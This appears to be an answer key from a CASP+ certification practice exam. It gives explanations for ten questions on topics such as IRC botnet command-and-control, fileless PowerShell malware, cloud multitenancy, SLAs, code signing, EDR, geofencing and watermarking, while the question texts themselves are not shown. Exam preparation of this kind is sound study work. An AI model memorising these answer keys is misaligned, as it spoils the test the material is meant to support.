The latest changes and updates from the administration for this exam.
Latest Update: Jun 22 2026
All questions are working fine.
Correct AnswerC
A is incorrect: A SQL injection attack could explain unauthorized access to a database-backed system, but the observed telemetry does not fit a live SQLi exfiltration pattern. The evidence shows a long-lived outbound TCP/6667session with the payload JOIN #community, which is characteristic of IRC-style command-and-control, not database query abuse. CASP+ materials treat SQL injection as a web-application attack against backend data stores, whereas this scenario points to persistent malware communications rather than direct query-based exfiltration.
B is incorrect: Cryptocurrency mining malware typically causes sustained CPU or GPU utilization, abnormal system performance, and outbound connections to mining pools using mining protocols. The evidence here instead shows a persistent connection on TCP/6667with very small periodic communications and an IRC-style JOINcommand. That traffic pattern is much more consistent with a compromised host maintaining low-volume command-and-control communications than with mining activity.
C is correct: This is the best answer. The persistent TCP/6667connection and the ASCII payload JOIN #communitystrongly indicate Internet Relay Chat (IRC)communications. CASP+ references identify instant messaging channels as potential carriers for malware, including backdoor Trojan horses, and note that such tools can be used for hijacking and unauthorized control. A long-lived outbound IRC session from a database server to an unknown external IP, especially after the administrator logged out, is most consistent with a botnet Trojan maintaining command-and-control access.
D is incorrect: This is not the best answer because the facts do not support legitimate administrator activity. The dbadmin session ended at 8:05 a.m., but the suspicious connection established at 7:55 a.m.remained active long afterward, with periodic low-volume traffic. Also, a database server maintaining an external IRC session to an unknown address is inconsistent with normal administrative support behavior. The evidence indicates persistence and covert communications, not a human administrator casually seeking help.
Correct AnswerA
A is correct: This is correct. One of the primary concerns organizations and partners have regarding cloud environments is multitenancy, where multiple customers share the same underlying infrastructure. This can raise concerns about data leakage, unauthorized access, or insufficient isolation between tenants. By designing strong data protection schemes—such as encryption, tenant isolation controls, strict access management, and segmentation—the company can demonstrate that risks associated with multitenancy are mitigated. From a CASP+ governance perspective, addressing the partners’ primary security concerns through compensating technical controls is the most effective way to gain agreement during contract renegotiation. Demonstrating how confidentiality and isolation are preserved in the cloud environment directly supports the negotiation objective.
B is incorrect: This is incorrect. Implementing redundant stores and services across multiple cloud service providers improves availability and resilience, ensuring systems remain operational even if one provider experiences an outage. While this can be an important architectural design choice for business continuity, the scenario centers on partners’ concerns about processing and storing sensitive data in the cloud under NDA restrictions. High availability does not directly address the confidentiality or isolation risks that typically drive contractual limitations on cloud storage. Therefore, this option is not the most relevant argument to gain partner consensus.
C is incorrect: This is incorrect. Emulating operating systems and hardware architectures to obscure operations from the cloud provider does not represent a standard or practical approach to addressing contractual or security concerns related to cloud adoption. While some forms of virtualization or obfuscation might reduce visibility into workloads, this approach does not directly provide assurance about data protection, confidentiality, or governance. Partners evaluating NDA compliance are more likely to focus on well-defined security controls such as encryption, isolation, and access management rather than architectural obfuscation techniques.
D is incorrect: This is incorrect. File Integrity Monitoring detects and alerts on unauthorized modifications to files. While this control improves security monitoring and helps maintain data integrity, it does not address the broader concerns related to storing sensitive data in cloud environments under NDA restrictions. The partners’ hesitation is likely related to data exposure risks, multitenancy, and control over protected information, not solely to file modification events. As a result, FIM alone would not be sufficient to convince partners to allow the data to be processed or stored in the cloud.
Correct AnswerB
A is incorrect: Manual cable inspection involves physically examining network cables and connections to identify hardware faults or connectivity issues. This activity supports network maintenance but has no role in monitoring account behavior or detecting anomalies in system activity. It cannot establish behavioral baselines for service accounts.
B is correct: Behavioral analytics analyzes historical activity patterns for users and service accounts to establish a baseline of normal behavior. By applying statistical models or machine learning, security tools can identify deviations such as unusual login times, abnormal API usage, or unexpected resource access. CASP security operations guidance highlights behavioral analytics as a key method for detecting insider threats and compromised accounts by identifying anomalies relative to established baselines.
C is incorrect: Static route reviewinvolves examining manually configured routing entries within network infrastructure. While useful for troubleshooting routing issues or verifying network configurations, it does not provide insight into authentication behavior or service account usage patterns. Therefore, it cannot detect deviations in account activity.
D is incorrect: Disk wiping is a data sanitization technique used to permanently remove data from storage devices prior to disposal or reuse. This process protects against data recovery but does not provide monitoring or analytics capabilities related to service account activity or anomaly detection.
Select all that apply
Correct AnswersA, C
A is correct: A is correct. Code signing provides cryptographic assurance that software originates from a trusted publisher and has not been modified since it was signed. The developer signs the program using a private key associated with a certificate issued by a trusted certificate authority. When users or systems validate the signature, they can confirm both the publisher’s identity and the integrity of the code. CASP+ materials emphasize code signing as a primary control to protect software distribution channels and ensure that malicious actors cannot modify application modules without invalidating the signature.
B is incorrect: B is incorrect. Certificate-based authentication is primarily used to authenticate users, systems, or services in secure communications. For example, it is commonly implemented in TLS, VPNs, or mutual authentication scenarios where identity verification is required. While certificates are involved in code signing, certificate-based authentication itself does not ensure the integrity of individual modules within a program. The purpose here is authentication of entities, not integrity protection of software artifacts.
C is correct: C is correct. Hashing mechanisms allow developers or systems to verify that files have not been altered. By generating and comparing hashes for each module, a developer can detect whether the code has been modified after distribution. Although MD5 is considered weak for cryptographic security due to collision vulnerabilities, it still illustrates the concept of verifying integrity through hashing. CASP+ guidance highlights the use of hashing functions to ensure file integrity validation, which directly aligns with the objective of detecting unauthorized modification of program modules.
D is incorrect: D is incorrect. Compressing a program with a password protects the archive during storage or transmission but does not provide strong integrity guarantees once the program is extracted. A password-protected archive does not prevent the executable code from being altered after extraction, nor does it provide cryptographic verification that the code has remained unchanged. Therefore, this option does not effectively protect program modules from malicious modification.
E is incorrect: E is incorrect. Encrypting the program with 3DES would protect confidentiality of the code while stored or transmitted, but encryption alone does not provide verification that the code has not been altered after decryption. Integrity validation requires hashing or digital signatures. Additionally, 3DES is considered legacy encryption and is gradually being deprecated in modern cryptographic practices. Consequently, encryption alone does not directly address the developer’s need to ensure that modules cannot be modified unnoticed.
F is incorrect: F is incorrect. Making the discretionary access control list (DACL) read-only would restrict permissions on a file or directory, but it does not cryptographically guarantee integrity. Access control mechanisms can be bypassed by privileged users or compromised systems. CASP+ exam logic typically favors cryptographic integrity controls over purely administrative file permissions when the requirement is to ensure that software code cannot be altered without detection. Therefore, this option does not sufficiently protect code integrity.
Correct AnswerB
A is incorrect: Pricing for additional services may appear in commercial agreements or master service agreements (MSAs), but it is not the primary focus of a Service Level Agreement. An SLA specifically defines measurable service expectations rather than pricing structures. Pricing is usually handled in separate contractual sections or procurement agreements.
B is correct: Performance metrics are the most common and defining component of a Service Level Agreement (SLA). An SLA establishes measurable service objectives such as uptime percentage, latency thresholds, response times, and availability targets. CASP+ governance guidance indicates that SLAs include clearly defined metrics used to evaluate whether the service provider is meeting the agreed service quality levels. These metrics allow both parties to monitor performance and determine compliance with contractual service commitments.
C is incorrect: An SLA typically defines responsibilities for both the service provider and the customer, not only the provider. It clarifies roles, escalation procedures, and expectations for both parties to ensure the agreed service levels can be achieved. Therefore, describing only the provider’s responsibility would not accurately represent a typical SLA structure.
D is incorrect: Limitation of liability clauses are commonly found in legal contracts between organizations and service providers, but they are not the defining or most common functional component of a network SLA. Such clauses are generally part of broader contractual agreements rather than the operational service performance portion of the SLA.
E is incorrect: Confidentiality and non-disclosure clauses are important legal protections in many contracts, particularly when sensitive information may be shared between organizations. However, these clauses are usually defined in separate non-disclosure agreements (NDAs) or master service agreements rather than representing the central purpose of an SLA, which is to define measurable service performance commitments.
Correct AnswerC
A is incorrect: This is incorrect. Maintaining an on-premises backup environment could provide an additional recovery option if the cloud provider fails. However, this approach introduces significant operational complexity and partially undermines the benefits of digital transformation to the cloud. It also does not directly address resiliency within the cloud service model or guarantee SLA compliance during a cloud provider incident. From an architectural perspective, hybrid failback to on-premises infrastructure is generally less efficient than using distributed cloud architectures designed for resilience.
B is incorrect: This is incorrect. A round-robin load balancer distributes traffic across multiple servers to improve performance and availability. However, this solution only provides resilience within a single environment or provider. If the cloud service provider itself experiences a major outage, the load balancer cannot redirect traffic outside of that provider’s infrastructure. Therefore, it does not sufficiently address the concern of maintaining service availability during a CSP-level incident.
C is correct: This is correct. A multicloud architecture uses services from multiple cloud providers, which significantly reduces dependency on any single provider. If one CSP experiences an outage or service disruption, workloads can continue operating on another provider’s infrastructure. This approach directly mitigates provider-level failure risks and helps organizations meet strict service-level agreement requirements. From a resilience and risk management perspective, distributing workloads across multiple CSPs provides stronger protection against large-scale outages affecting a single provider.
D is incorrect: This is incorrect. Active-active deployments within the same tenant can improve application availability by distributing workloads across multiple instances or regions within the same cloud provider. While this increases redundancy at the infrastructure or application level, it does not mitigate the risk of a provider-wide outage. Because the organization’s concern specifically involves a CSP incident affecting SLA commitments, relying solely on redundancy within one provider does not fully address the risk.
Correct AnswerC
A is incorrect: A worm is a type of malware that self-replicates and spreads automatically across networks without requiring user interaction. Worms typically exploit vulnerabilities to propagate between systems and often leave artifacts such as files, processes, or network traffic patterns that can be detected by antivirus or intrusion detection tools. In the scenario, the attack involved a PowerShell command using Invoke-Expression to execute an external script, and a disk scan revealed no indicators of compromise (IOCs). This suggests the malware did not rely on persistent files on disk, which is inconsistent with typical worm behavior. Therefore, worm malware does not best describe the attack observed.
B is incorrect: A logic bomb is malicious code that remains dormant within a system until specific conditions are met, such as a certain date, time, or triggering event. Logic bombs are typically embedded within legitimate software or scripts and activate only when predefined criteria occur. While logic bombs can cause significant damage once triggered, the scenario describes malware that actively executed a remote script through PowerShell. There is no indication of conditional activation or delayed execution based on triggers, which are the defining characteristics of logic bombs. Therefore, this option does not match the behavior described.
C is correct: Fileless malware is malicious code that operates primarily in system memory and leverages legitimate tools—such as PowerShell, Windows Management Instrumentation (WMI), or other system utilities—to execute attacks without writing traditional malicious files to disk. Because fileless malware often executes directly in memory, standard antivirus disk scans frequently fail to detect indicators of compromise. The scenario specifically mentions the use of PowerShell Invoke-Expression to execute an external malicious script, followed by an antivirus scan that found no artifacts on disk. This behavior strongly aligns with fileless malware techniques, which exploit built-in system tools and avoid leaving persistent files. Therefore, the security solution should focus on detecting and preventing fileless attacks through behavioral monitoring, memory analysis, and endpoint detection capabilities.
D is incorrect: A rootkit is a type of malware designed to hide its presence and maintain privileged access to a system by modifying operating system components, drivers, or kernel modules. Rootkits typically provide persistent stealth capabilities and may conceal files, processes, or network activity from security tools. While rootkits can evade detection, they usually involve deeper system-level modifications and persistence mechanisms rather than simply executing malicious scripts in memory via PowerShell. The scenario does not indicate kernel manipulation or persistence mechanisms typical of rootkits, making this option less appropriate than fileless malware.
Correct AnswerB
A is incorrect: Covered parking can reduce visual observation of personnel entering or exiting vehicles. However, the scenario concerns competitors tracking personnel, which is typically accomplished through digital means such as GPS signals, mobile devices, or wearable technologies rather than visual surveillance. While covered parking may reduce physical visibility, it does not prevent location tracking through electronic devices that transmit geolocation data.
B is correct: Geofencing can enforce location-based policies on mobile devices and wearable technologies. By configuring geofencing controls to disable or restrict devices when they enter the vicinity of the secure facility, the organization can prevent location data from being transmitted to external services. This reduces the risk that competitors could track employee movement through mobile applications, GPS-enabled wearables, or other location-aware devices. Because the concern is personnel being tracked electronically when accessing the facility, geofencing is the most effective mitigation.
C is incorrect: Constructing a tunnel between the headquarters and the facility would reduce visibility of employees traveling between the two locations. However, building such infrastructure would be extremely expensive and does not address the primary tracking mechanism, which is likely to involve mobile device location services. Even if employees traveled through a tunnel, their devices could still broadcast location data outside the facility. Therefore, this option is impractical and does not effectively mitigate the risk described.
D is incorrect: Physical security measures such as access control vestibules, fencing, and perimeter barriers help prevent unauthorized entry into a facility and protect against physical intrusion. While these controls improve facility security, they do not address the specific concern of competitors tracking personnel through digital location services or mobile devices. Therefore, they do not mitigate the risk described in the scenario.
Correct AnswerA
A is correct: This is correct. Endpoint Detection and Response solutions provide advanced monitoring, behavioral analysis, and threat detection capabilities on endpoints. Unlike traditional antivirus tools that rely primarily on signatures, EDR platforms detect suspicious activity, malware behavior, and indicators of compromise in real time. They also support automated containment, forensic investigation, and response capabilities. In the scenario, malware caused service outages and impacted a remote executive device. EDR would improve visibility into endpoint activity and allow faster detection and containment of advanced malware threats, making it a stronger control for preventing further endpoint disruption.
B is incorrect: This is incorrect. Removing the web proxy and replacing it with a Unified Threat Management appliance would modify the perimeter security architecture but would not directly address the malware affecting endpoints, especially for users working remotely. Additionally, the organization already has a web proxy protecting the edge network. The issue described is malware affecting endpoint systems rather than insufficient gateway security, so this change would not effectively mitigate the problem.
C is incorrect: This is incorrect. A deny list approach blocks known malicious files, domains, or processes. While it can provide some level of protection, deny lists are reactive and limited because they only block threats that are already known. Modern malware often changes signatures or behaviors to evade static block lists. Because the scenario involves new malware causing disruptions, relying on a deny list alone would not provide sufficient protection against evolving threats.
D is incorrect: This is incorrect. Adding a firewall module to the existing antivirus may provide additional network filtering at the host level, but it does not significantly improve malware detection capabilities. The root issue is malware infection affecting endpoints, which requires improved threat detection and response capabilities rather than basic network filtering. Compared with advanced endpoint detection technologies, a firewall module offers limited protection against sophisticated or unknown malware.
Correct AnswerC
A is incorrect: A. Steganography.Steganography is the technique of hiding information inside another file, such as embedding secret data within images, audio, or documents so that the presence of the hidden data is not obvious. While this method conceals information, it is primarily used for covert communication rather than intellectual property protection. The scenario requires embedding proof of ownership within a document to support copyright claims. Steganography focuses on secrecy rather than establishing verifiable ownership or copyright attribution, so it is not the best choice for this purpose.
B is incorrect: B. E-signature. An electronic signature provides a method of digitally signing documents to confirm identity and approval of the contents. It is typically used in legal agreements or transactions to validate that a specific individual has approved or authorized a document. However, e-signatures are visible attributes associated with authentication and nonrepudiation rather than hidden indicators of ownership. The requirement in the scenario is to embed a covert sign of ownership without adding visible identifying attributes, which an e-signature does not accomplish.
C is correct: C. Watermarking. This is the correct answer because digital watermarking embeds ownership information within the document itself in a way that may not be immediately visible or easily removed. Watermarks can be designed to be imperceptible to normal users while still allowing the owner to prove authorship or copyright ownership if the document is copied or distributed without authorization. Digital watermarking is commonly used to protect intellectual property such as images, documents, audio, and video by embedding ownership markers that remain associated with the content even if the file is redistributed.
D is incorrect: D. Cryptography.Cryptography is used to protect the confidentiality and integrity of information through encryption and related techniques. While cryptographic methods can secure a document during transmission or storage, they do not embed ownership information into the document itself. Once the document is decrypted, there is no persistent mechanism proving authorship or ownership embedded within the file. Therefore, cryptography does not meet the requirement to covertly embed a sign of ownership for copyright protection.
